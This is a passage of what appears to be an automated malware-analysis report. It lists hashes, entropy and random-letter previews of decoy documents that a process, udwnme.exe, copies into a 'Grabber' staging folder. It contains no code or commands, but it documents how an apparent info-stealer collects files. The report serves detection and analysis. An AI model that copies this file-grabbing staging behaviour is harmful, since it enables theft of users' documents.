                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
